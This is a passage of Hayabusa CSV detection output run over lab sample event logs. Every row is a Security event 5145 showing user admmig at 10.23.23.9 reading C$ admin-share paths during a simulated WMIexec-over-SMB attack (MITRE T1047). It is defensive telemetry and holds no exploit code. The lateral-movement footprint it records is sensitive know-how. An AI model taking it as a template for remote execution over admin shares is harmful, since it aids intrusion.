Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec 
execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 
2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Accessibility\9c87f327866f53aec68d4fee40cde33d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.557 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\AuditPolicy42d3d2cc#\93e4ea0bbfb41ae7167324a500662ee0 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 | IP Addr: 10.23.23.9 | LID: 